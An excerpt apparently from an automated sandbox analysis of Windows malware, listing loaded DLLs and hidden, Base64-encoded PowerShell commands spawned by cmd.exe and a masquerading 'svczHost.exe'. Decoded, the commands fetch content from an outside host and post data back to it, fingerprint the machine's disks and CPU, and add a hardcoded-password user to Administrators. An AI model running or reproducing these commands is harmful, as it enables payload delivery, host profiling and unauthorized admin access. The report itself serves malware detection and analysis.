        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: samlib.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dll
        Source: Window RecorderWindow detected: More than 3 window changes detected
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
        Source: Binary string: ion.pdbp> source: powershell.exe, 00000005.00000002.2369835979.000001ABF3723000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: bb.pdb source: powershell.exe, 00000005.00000002.2369835979.000001ABF3723000.00000004.00000020.00020000.00000000.sdmp

        Data Obfuscation

        barindex
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String("dmJpOXFjMjl1SWpzTkNnMEtJQ0FnSUNSb1pXRmtaWEp6V3lSclpYbGRJRDBnSkhaaGJIVmxPdzBLSUNBZ0lDUjFjbWtnUFNBaWFIUjBjSE02THk5cmFXNW5jMjFoYTJWeUxtTmhMelJqWW1RMk16ZGhNVGhqWVRjM01EaGxPRE14WVdFd09HRm
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle hidden -NoLogo -NoProfile -ExecutionPolicy bypass -EncodedCommand JAB1AHIAaQAgAD0AIAAiAGgAdAB0AHAAcwA6AC8ALwBrAGkAbgBnAHMAbQBhAGsAZQByAC4AYwBhAC8AZgBpAGwAZQAyAC8AMwA3AGUAMgBhADUANwA2ADcAOAAxAGYANgAwAGUAYQBlAGEANQA1AGUAMwA3ADkAYgBlADYAYQBlADAAMAA3ADcANgA0ADEAYgAzADkAZgA1ADkAMAA3ADkAMgA0AGQAOAA1ADIANAAyADQAMQBlADIAOQBiADcAYQA1ADMAYQA2ADEAMwBiADMAZAAzADcAZgA5ADAAZQAwADAANQBlADEAMQBiADkANgBkADYAMQAxADcANgAyADkAMAA0ADYAOQA5ADAAYwAxAGQAZgA3ADkAYQBhADkANwAzADUAMgA4ADkAMwAwADgAYwAxAGIAMgBmAGEAOQBlAGQAZQBlAGEANABkAGMANQBmAGUANQBhADAAOQBiAGYAOQBiADIANwA3ADMAZQBlAGEAZgA5ADAAOQA1ADAAYgA2ADkANgBmAGUAMQAwAGMAYwA5AGQAYgAzADcANAA1AGIANQAxADUAMQBlADQAYgAwADAAMABhADcAOQAxADIAMQAzAGMAZgA5ADMAZgAyADUAMAA3ADAAZgA1ADgAOQBiADQAMABmAGQAMwBlADMAOQBjADQAYQAxADgAZQBkAGEAZAAyACIAOwANAAoAJABjAG8AdQBuAHQAIAA9ACAAMQAwADAAOwANAAoADQAKAA0ACgANAAoAZgB1AG4AYwB0AGkAbwBuACAAUwBlAG4AZAAgAHsADQAKACAAIAAgACAAcABhAHIAYQBtACgAIABbAFAAUwBPAGIAagBlAGMAdABdACAAJABsAG8AZwBNAHMAZwAgACkADQAKAA0ACgAgACAAIAAgACMAIABDAG8AbgB2AGUAcgB0ACAAYgBvAGQAeQAgAHQAbwAgAHMAdAByAGkAbgBnAA0ACgAgACAAIAAgACQAcwB0AHIAaQBuAGcAQgBvAGQAeQAgAD0AIABbAHMAdAByAGkAbgBnAF0AKAAkAGwAbwBnAE0AcwBnACAAfAAgAEMAbwBuAHYAZQByAHQAVABvAC0ASgBzAG8AbgApADsADQAKACAAIAAgACAAJABsAG8AZwBNAGUAcwBzAGEAZwBlAHMAIAA9ACAAQAAoACkAOwANAAoAIAAgACAAIAAkAGwAbwBnAE0AZQBzAHMAYQBnAGUAcwAgACsAPQAgACQAcwB0AHIAaQBuAGcAQgBvAGQAeQA7AA0ACgAgACAAIAAgACQAbABvAGcATQBlAHMAcwBhAGcAZQBzACAAKwA9ACAAIgAtAC0ALQAtAC0ALQAtAC0ALQAtACIAOwANAAoADQAKACAAIAAgACAAJABoAGUAYQBkAGUAcgBzACAAPQAgAEAAewB9ADsADQAKACAAIAAgACAAJABrAGUAeQAgAD0AIAAiAEMAbwBuAHQAZQBuAHQALQBUAHkAcABlACIAOwANAAoAIAAgACAAIAAkAHYAYQBsAHUAZQAgAD0AIAAiAGEAcABwAGwAaQBjAGEAdABpAG8AbgAvAGoAcwBvAG4AIgA7AA0ACgANAAoAIAAgACAAIAAkAGgAZQBhAGQAZQByAHMAWwAkAGsAZQB5AF0AIAA9ACAAJAB2AGEAbAB1AGUAOwANAAoAIAAgACAAIAAkAHUAcgBpACAAPQAgACIATABPAEcAVQBSAEwAIgA7AA0ACgAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJABiAG8AZAB5ACAAPQAgACQAbABvAGcATQBlAHMAcwBhAGcAZQBzACAAfAAgAEMAbwBuAHYAZQByAHQAVABvAC0ASgBzAG8AbgA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJAB1AHIAaQAgAC0ATQBlAHQAaABvAGQAIABQAG8AcwB0ACAALQBIAGUAYQBkAGUAcgBzACAAJABoAGUAYQBkAGUAcgBzACAALQBCAG8AZAB5ACAAJABiAG8AZAB5AA0ACgAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAGMAYQB0AGMAaAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAADQAKAH0ADQAKAA0ACgB3AGgAaQBsAGUAKAAkAGMAbwB1AG4AdAAgAC0AZwB0ACAAMAApAA0ACgB7AA0ACgAJAA0ACgAJAHQAcgB5AHsADQAKACAAIAAgACAAIAAgACAAIABTAGUAbgBkACAAIgBiAGUAZwBpAG4AIABkAG8AdwBuAGwAbwBhAGQAIAAkAHUAcgBpACIAOwANAAoACQAJACQAYwBvAG4AdABlAG4AdAAgAD0AIABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJAB1AHIAaQAgAC0AVQBzAGUAQgBhAHMAaQBjAFAAYQByAHMAaQBuAGcAOwANAAoAIAAgACAAIAAgACAAIAAgACQAYgB5AHQAZQBBAHIAcgBhAHkAIAA9ACAAJABjAG8AbgB0AGUAbgB0AC4AYwBvAG4AdABlAG4AdAA7AA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAIAAoACQAaQAgAD0AIAAwADsAIAAkAG
        Source: C:\Windows\Temp\svczHost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -NoLogo -NoProfile -WindowStyle Hidden -ExecutionPolicy bypass -EncodedCommand ZgB1AG4AYwB0AGkAbwBuACAARwBlAHQALQBJAGQAZQBuAHQAaQB0AHkAewAKACAAIAAgACAAJABoAGEAcgBkAEQAcgBpAHYAZQBzACAAPQAgAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIAAtAEMAbABhAHMAcwAgAFcAaQBuADMAMgBfAEQAaQBzAGsARAByAGkAdgBlACAAfAAgAFcAaABlAHIAZQAtAE8AYgBqAGUAYwB0ACAAewAgACQAXwAuAE0AZQBkAGkAYQBUAHkAcABlACAALQBlAHEAIAAiAEYAaQB4AGUAZAAgAGgAYQByAGQAIABkAGkAcwBrACAAbQBlAGQAaQBhACIAIAAtAG8AcgAgACQAXwAuAE0AZQBkAGkAYQBUAHkAcABlACAALQBlAHEAIAAiAEYAaQB4AGUAZAAgAGgAYQByAGQAIABkAGkAcwBrACAAbQBlAGQAaQBhACAALQAgAFMAUwBEACIAIAB9AAoAJABkAHIAaQB2AGUASQBuAGYAbwBBAHIAcgBhAHkAIAA9ACAAQAAoACkACgBmAG8AcgBlAGEAYwBoACAAKAAkAGgAYQByAGQARAByAGkAdgBlACAAaQBuACAAJABoAGEAcgBkAEQAcgBpAHYAZQBzACkAIAB7AAoAIAAgACAAIAAkAHMAZQByAGkAYQBsAE4AdQBtAGIAZQByACAAPQAgACQAaABhAHIAZABEAHIAaQB2AGUALgBTAGUAcgBpAGEAbABOAHUAbQBiAGUAcgAKACAAIAAgACAAJABtAG8AZABlAGwAIAA9ACAAJABoAGEAcgBkAEQAcgBpAHYAZQAuAE0AbwBkAGUAbAAKACAAIAAgACAAJABkAHIAaQB2AGUASQBuAGYAbwAgAD0AIAAiAFMAZQByAGkAYQBsACAATgB1AG0AYgBlAHIAOgAgACQAcwBlAHIAaQBhAGwATgB1AG0AYgBlAHIALAAgAE0AbwBkAGUAbAA6ACAAJABtAG8AZABlAGwAIgAKACAAIAAgACAAJABkAHIAaQB2AGUASQBuAGYAbwBBAHIAcgBhAHkAIAArAD0AIAAkAGQAcgBpAHYAZQBJAG4AZgBvAAoAfQAKACQAYwBvAG0AYgBpAG4AZQBkAEkAbgBmAG8AIAA9ACAAJABkAHIAaQB2AGUASQBuAGYAbwBBAHIAcgBhAHkAIAAtAGoAbwBpAG4AIAAiAGAAcgBgAG4AIgAKACQAYwBwAHUASQBuAGYAbwAgAD0AIABHAGUAdAAtAFcAbQBpAE8AYgBqAGUAYwB0ACAALQBDAGwAYQBzAHMAIABXAGkAbgAzADIAXwBQAHIAbwBjAGUAcwBzAG8AcgAKACQAYwBwAHUARABlAHQAYQBpAGwAcwAgAD0AIAAiAFAAcgBvAGMAZQBzAHMAbwByAEkAZAA6ACAAJAAoACQAYwBwAHUASQBuAGYAbwAuAFAAcgBvAGMAZQBzAHMAbwByAEkAZAApACwAIABOAGEAbQBlADoAIAAkACgAJABjAHAAdQBJAG4AZgBvAC4ATgBhAG0AZQApACwAIABNAGEAeABDAGwAbwBjAGsAUwBwAGUAZQBkADoAIAAkACgAJABjAHAAdQBJAG4AZgBvAC4ATQBhAHgAQwBsAG8AYwBrAFMAcABlAGUAZAApACwAIABVAG4AaQBxAHUAZQBJAGQAOgAgACQAKAAkAGMAcAB1AEkAbgBmAG8ALgBVAG4AaQBxAHUAZQBJAGQAKQAiAAoAJABhAGwAbABJAG4AZgBvACAAPQAgACIAJABjAG8AbQBiAGkAbgBlAGQASQBuAGYAbwBgAHIAYABuACQAYwBwAHUARABlAHQAYQBpAGwAcwAiAAoAJABtAGQANQAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBTAGUAYwB1AHIAaQB0AHkALgBDAHIAeQBwAHQAbwBnAHIAYQBwAGgAeQAuAE0ARAA1AEMAcgB5AHAAdABvAFMAZQByAHYAaQBjAGUAUAByAG8AdgBpAGQAZQByAAoAJABiAHkAdABlAHMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AEIAeQB0AGUAcwAoACQAYQBsAGwASQBuAGYAbwApAAoAJABoAGEAcwBoAEIAeQB0AGUAcwAgAD0AIAAkAG0AZAA1AC4AQwBvAG0AcAB1AHQAZQBIAGEAcwBoACgAJABiAHkAdABlAHMAKQAKACQAaABhAHMAaAAgAD0AIABbAEIAaQB0AEMAbwBuAHYAZQByAHQAZQByAF0AOgA6AFQAbwBTAHQAcgBpAG4AZwAoACQAaABhAHMAaABCAHkAdABlAHMAKQAgAC0AcgBlAHAAbABhAGMAZQAgACcALQAnAAoAIAAgACAAIAByAGUAdAB1AHIAbgAgACQAaABhAHMAaAA7AAoAfQAKAGMAZAAgACIAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFQAZQBtAHAAIgA7AAoAJAB0AGUAcwB0ACAAPQAgAEcAZQB0AC0ASQBkAGUAbgB0AGkAdAB5ADsACgAkAHQAZQBzAHQAIAB8ACAATwB1AHQALQBGAGkAbABlACAALQBGAGkAbABlAFAAYQB0AGgAIAAiAGQAZQB2AGkAYwBlAEkAZAAuAHQAeAB0ACIAIAAtAEUAbgBjAG8AZABpAG4AZwAgAFUAVABGADgA
        Source: C:\Windows\Temp\svczHost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -NoLogo -NoProfile -WindowStyle Hidden -ExecutionPolicy bypass -EncodedCommand JABVAHMAZQByAG4AYQBtAGUAIAA9ACAAIgBVAHMAZQByADEAIgA7ACQAcAB3AGQAIAA9ACAAIgAxADIAMwA0ADUANgA3ADgAOQAhAEEAMQBhACIAOwAgACQAVQBzAGUAcgBQAGEAcgBhAG0AcwAgAD0AIABAAHsAJwBOAGEAbQBlACcAIAA9ACAAJABVAHMAZQByAG4AYQBtAGUAOwAgACcAUABhAHMAcwB3AG8AcgBkACcAIAA9ACAAKABDAG8AbgB2AGUAcgB0AFQAbwAtAFMAZQBjAHUAcgBlAFMAdAByAGkAbgBnACAALQBTAHQAcgBpAG4AZwAgACQAcAB3AGQAIAAtAEEAcwBQAGwAYQBpAG4AVABlAHgAdAAgAC0ARgBvAHIAYwBlACkAOwAgACcAUABhAHMAcwB3AG8AcgBkAE4AZQB2AGUAcgBFAHgAcABpAHIAZQBzACcAIAA9ACAAJAB0AHIAdQBlAH0AOwBOAGUAdwAtAEwAbwBjAGEAbABVAHMAZQByACAAQABVAHMAZQByAFAAYQByAGEAbQBzADsAJABHAHIAbwB1AHAAUABhAHIAYQBtAHMAIAA9ACAAQAB7ACcARwByAG8AdQBwACcAIAA9ACAAJwBBAGQAbQBpAG4AaQBzAHQAcgBhAHQAbwByAHMAJwA7ACAAJwBNAGUAbQBiAGUAcgAnACAAPQAgACQAVQBzAGUAcgBuAGEAbQBlAH0AOwBBAGQAZAAtAEwAbwBjAGEAbABHAHIAbwB1AHAATQBlAG0AYgBlAHIAIABAAEcAcgBvAHUAcABQAGEAcgBhAG0AcwA7AA0ACgA=
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle hidden -NoLogo -NoProfile -ExecutionPolicy bypass -EncodedCommand JAB1AHIAaQAgAD0AIAAiAGgAdAB0AHAAcwA6AC8ALwBrAGkAbgBnAHMAbQBhAGsAZQByAC4AYwBhAC8AZgBpAGwAZQAyAC8AMwA3AGUAMgBhADUANwA2ADcAOAAxAGYANgAwAGUAYQBlAGEANQA1AGUAMwA3ADkAYgBlADYAYQBlADAAMAA3ADcANgA0ADEAYgAzADkAZgA1ADkAMAA3ADkAMgA0AGQAOAA1ADIANAAyADQAMQBlADIAOQBiADcAYQA1ADMAYQA2ADEAMwBiADMAZAAzADcAZgA5ADAAZQAwADAANQBlADEAMQBiADkANgBkADYAMQAxADcANgAyADkAMAA0ADYAOQA5ADAAYwAxAGQAZgA3ADkAYQBhADkANwAzADUAMgA4ADkAMwAwADgAYwAxAGIAMgBmAGEAOQBlAGQAZQBlAGEANABkAGMANQBmAGUANQBhADAAOQBiAGYAOQBiADIANwA3ADMAZQBlAGEAZgA5ADAAOQA1ADAAYgA2ADkANgBmAGUAMQAwAGMAYwA5AGQAYgAzADcANAA1AGIANQAxADUAMQBlADQAYgAwADAAMABhADcAOQAxADIAMQAzAGMAZgA5ADMAZgAyADUAMAA3ADAAZgA1ADgAOQBiADQAMABmAGQAMwBlADMAOQBjADQAYQAxADgAZQBkAGEAZAAyACIAOwANAAoAJABjAG8AdQBuAHQAIAA9ACAAMQAwADAAOwANAAoADQAKAA0ACgANAAoAZgB1AG4AYwB0AGkAbwBuACAAUwBlAG4AZAAgAHsADQAKACAAIAAgACAAcABhAHIAYQBtACgAIABbAFAAUwBPAGIAagBlAGMAdABdACAAJABsAG8AZwBNAHMAZwAgACkADQAKAA0ACgAgACAAIAAgACMAIABDAG8AbgB2AGUAcgB0ACAAYgBvAGQAeQAgAHQAbwAgAHMAdAByAGkAbgBnAA0ACgAgACAAIAAgACQAcwB0AHIAaQBuAGcAQgBvAGQAeQAgAD0AIABbAHMAdAByAGkAbgBnAF0AKAAkAGwAbwBnAE0AcwBnACAAfAAgAEMAbwBuAHYAZQByAHQAVABvAC0ASgBzAG8AbgApADsADQAKACAAIAAgACAAJABsAG8AZwBNAGUAcwBzAGEAZwBlAHMAIAA9ACAAQAAoACkAOwANAAoAIAAgACAAIAAkAGwAbwBnAE0AZQBzAHMAYQBnAGUAcwAgACsAPQAgACQAcwB0AHIAaQBuAGcAQgBvAGQAeQA7AA0ACgAgACAAIAAgACQAbABvAGcATQBlAHMAcwBhAGcAZQBzACAAKwA9ACAAIgAtAC0ALQAtAC0ALQAtAC0ALQAtACIAOwANAAoADQAKACAAIAAgACAAJABoAGUAYQBkAGUAcgBzACAAPQAgAEAAewB9ADsADQAKACAAIAAgACAAJABrAGUAeQAgAD0AIAAiAEMAbwBuAHQAZQBuAHQALQBUAHkAcABlACIAOwANAAoAIAAgACAAIAAkAHYAYQBsAHUAZQAgAD0AIAAiAGEAcABwAGwAaQBjAGEAdABpAG8AbgAvAGoAcwBvAG4AIgA7AA0ACgANAAoAIAAgACAAIAAkAGgAZQBhAGQAZQByAHMAWwAkAGsAZQB5AF0AIAA9ACAAJAB2AGEAbAB1AGUAOwANAAoAIAAgACAAIAAkAHUAcgBpACAAPQAgACIATABPAEcAVQBSAEwAIgA7AA0ACgAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJABiAG8AZAB5ACAAPQAgACQAbABvAGcATQBlAHMAcwBhAGcAZQBzACAAfAAgAEMAbwBuAHYAZQByAHQAVABvAC0ASgBzAG8AbgA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJAB1AHIAaQAgAC0ATQBlAHQAaABvAGQAIABQAG8AcwB0ACAALQBIAGUAYQBkAGUAcgBzACAAJABoAGUAYQBkAGUAcgBzACAALQBCAG8AZAB5ACAAJABiAG8AZAB5AA0ACgAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAGMAYQB0AGMAaAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAADQAKAH0ADQAKAA0ACgB3AGgAaQBsAGUAKAAkAGMAbwB1AG4AdAAgAC0AZwB0ACAAMAApAA0ACgB7AA0ACgAJAA0ACgAJAHQAcgB5AHsADQAKACAAIAAgACAAIAAgACAAIABTAGUAbgBkACAAIgBiAGUAZwBpAG4AIABkAG8AdwBuAGwAbwBhAGQAIAAkAHUAcgBpACIAOwANAAoACQAJACQAYwBvAG4AdABlAG4AdAAgAD0AIABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJAB1AHIAaQAgAC0AVQBzAGUAQgBhAHMAaQBjAFAAYQByAHMAaQBuAGcAOwANAAoAIAAgACAAIAAgACAAIAAgACQAYgB5AHQAZQBBAHIAcgBhAHkAIAA9ACAAJABjAG8AbgB0AGUAbgB0AC4AYwBvAG4AdABlAG4AdAA7AA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAIAAoACQAaQAgAD0AIAAwADsAIAAkAGJump to behavior
        Source: C:\Windows\Temp\svczHost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -NoLogo -NoProfile -WindowStyle Hidden -ExecutionPolicy bypass -EncodedCommand ZgB1AG4AYwB0AGkAbwBuACAARwBlAHQALQBJAGQAZQBuAHQAaQB0AHkAewAKACAAIAAgACAAJABoAGEAcgBkAEQAcgBpAHYAZQBzACAAPQAgAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIAAtAEMAbABhAHMAcwAgAFcAaQBuADMAMgBfAEQAaQBzAGsARAByAGkAdgBlACAAfAAgAFcAaABlAHIAZQAtAE8AYgBqAGUAYwB0ACAAewAgACQAXwAuAE0AZQBkAGkAYQBUAHkAcABlACAALQBlAHEAIAAiAEYAaQB4AGUAZAAgAGgAYQByAGQAIABkAGkAcwBrACAAbQBlAGQAaQBhACIAIAAtAG8AcgAgACQAXwAuAE0AZQBkAGkAYQBUAHkAcABlACAALQBlAHEAIAAiAEYAaQB4AGUAZAAgAGgAYQByAGQAIABkAGkAcwBrACAAbQBlAGQAaQBhACAALQAgAFMAUwBEACIAIAB9AAoAJABkAHIAaQB2AGUASQBuAGYAbwBBAHIAcgBhAHkAIAA9ACAAQAAoACkACgBmAG8AcgBlAGEAYwBoACAAKAAkAGgAYQByAGQARAByAGkAdgBlACAAaQBuACAAJABoAGEAcgBkAEQAcgBpAHYAZQBzACkAIAB7AAoAIAAgACAAIAAkAHMAZQByAGkAYQBsAE4AdQBtAGIAZQByACAAPQAgACQAaABhAHIAZABEAHIAaQB2AGUALgBTAGUAcgBpAGEAbABOAHUAbQBiAGUAcgAKACAAIAAgACAAJABtAG8AZABlAGwAIAA9ACAAJABoAGEAcgBkAEQAcgBpAHYAZQAuAE0AbwBkAGUAbAAKACAAIAAgACAAJABkAHIAaQB2AGUASQBuAGYAbwAgAD0AIAAiAFMAZQByAGkAYQBsACAATgB1AG0AYgBlAHIAOgAgACQAcwBlAHIAaQBhAGwATgB1AG0AYgBlAHIALAAgAE0AbwBkAGUAbAA6ACAAJABtAG8AZABlAGwAIgAKACAAIAAgACAAJABkAHIAaQB2AGUASQBuAGYAbwBBAHIAcgBhAHkAIAArAD0AIAAkAGQAcgBpAHYAZQBJAG4AZgBvAAoAfQAKACQAYwBvAG0AYgBpAG4AZQBkAEkAbgBmAG8AIAA9ACAAJABkAHIAaQB2AGUASQBuAGYAbwBBAHIAcgBhAHkAIAAtAGoAbwBpAG4AIAAiAGAAcgBgAG4AIgAKACQAYwBwAHUASQBuAGYAbwAgAD0AIABHAGUAdAAtAFcAbQBpAE8AYgBqAGUAYwB0ACAALQBDAGwAYQBzAHMAIABXAGkAbgAzADIAXwBQAHIAbwBjAGUAcwBzAG8AcgAKACQAYwBwAHUARABlAHQAYQBpAGwAcwAgAD0AIAAiAFAAcgBvAGMAZQBzAHMAbwByAEkAZAA6ACAAJAAoACQAYwBwAHUASQBuAGYAbwAuAFAAcgBvAGMAZQBzAHMAbwByAEkAZAApACwAIABOAGEAbQBlADoAIAAkACgAJABjAHAAdQBJAG4AZgBvAC4ATgBhAG0AZQApACwAIABNAGEAeABDAGwAbwBjAGsAUwBwAGUAZQBkADoAIAAkACgAJABjAHAAdQBJAG4AZgBvAC4ATQBhAHgAQwBsAG8AYwBrAFMAcABlAGUAZAApACwAIABVAG4AaQBxAHUAZQBJAGQAOgAgACQAKAAkAGMAcAB1AEkAbgBmAG8ALgBVAG4AaQBxAHUAZQBJAGQAKQAiAAoAJABhAGwAbABJAG4AZgBvACAAPQAgACIAJABjAG8AbQBiAGkAbgBlAGQASQBuAGYAbwBgAHIAYABuACQAYwBwAHUARABlAHQAYQBpAGwAcwAiAAoAJABtAGQANQAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBTAGUAYwB1AHIAaQB0AHkALgBDAHIAeQBwAHQAbwBnAHIAYQBwAGgAeQAuAE0ARAA1AEMAcgB5AHAAdABvAFMAZQByAHYAaQBjAGUAUAByAG8AdgBpAGQAZQByAAoAJABiAHkAdABlAHMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AEIAeQB0AGUAcwAoACQAYQBsAGwASQBuAGYAbwApAAoAJABoAGEAcwBoAEIAeQB0AGUAcwAgAD0AIAAkAG0AZAA1AC4AQwBvAG0AcAB1AHQAZQBIAGEAcwBoACgAJABiAHkAdABlAHMAKQAKACQAaABhAHMAaAAgAD0AIABbAEIAaQB0AEMAbwBuAHYAZQByAHQAZQByAF0AOgA6AFQAbwBTAHQAcgBpAG4AZwAoACQAaABhAHMAaABCAHkAdABlAHMAKQAgAC0AcgBlAHAAbABhAGMAZQAgACcALQAnAAoAIAAgACAAIAByAGUAdAB1AHIAbgAgACQAaABhAHMAaAA7AAoAfQAKAGMAZAAgACIAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFQAZQBtAHAAIgA7AAoAJAB0AGUAcwB0ACAAPQAgAEcAZQB0AC0ASQBkAGUAbgB0AGkAdAB5ADsACgAkAHQAZQBzAHQAIAB8ACAATwB1AHQALQBGAGkAbABlACAALQBGAGkAbABlAFAAYQB0AGgAIAAiAGQAZQB2AGkAYwBlAEkAZAAuAHQAeAB0ACIAIAAtAEUAbgBjAG8AZABpAG4AZwAgAFUAVABGADgA
        Source: C:\Windows\Temp\svczHost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -NoLogo -NoProfile -WindowStyle Hidden -ExecutionPolicy bypass -EncodedCommand JABVAHMAZQByAG4AYQBtAGUAIAA9ACAAIgBVAHMAZQByADEAIgA7ACQAcAB3AGQAIAA9ACAAIgAxADIAMwA0ADUANgA3ADgAOQAhAEEAMQBhACIAOwAgACQAVQBzAGUAcgBQAGEAcgBhAG0AcwAgAD0AIABAAHsAJwBOAGEAbQBlACcAIAA9ACAAJABVAHMAZQByAG4AYQBtAGUAOwAgACcAUABhAHMAcwB3AG8AcgBkACcAIAA9ACAAKABDAG8AbgB2AGUAcgB0AFQAbwAtAFMAZQBjAHUAcgBlAFMAdAByAGkAbgBnACAALQBTAHQAcgBpAG4AZwAgACQAcAB3AGQAIAAtAEEAcwBQAGwAYQBpAG4AVABlAHgAdAAgAC0ARgBvAHIAYwBlACkAOwAgACcAUABhAHMAcwB3AG8AcgBkAE4AZQB2AGUAcgBFAHgAcABpAHIAZQBzACcAIAA9ACAAJAB0AHIAdQBlAH0AOwBOAGUAdwAtAEwAbwBjAGEAbABVAHMAZQByACAAQABVAHMAZQByAFAAYQByAGEAbQBzADsAJABHAHIAbwB1AHAAUABhAHIAYQBtAHMAIAA9ACAAQAB7ACcARwByAG8AdQBwACcAIAA9ACAAJwBBAGQAbQBpAG4AaQBzAHQAcgBhAHQAbwByAHMAJwA7ACAAJwBNAGUAbQBiAGUAcgAnACAAPQAgACQAVQBzAGUAcgBuAGEAbQBlAH0AOwBBAGQAZAAtAEwAbwBjAGEAbABHAHIAbwB1AHAATQBlAG0AYgBlAHIAIABAAEcAcgBvAHUAcABQAGEAcgBhAG0AcwA7AA0ACgA=
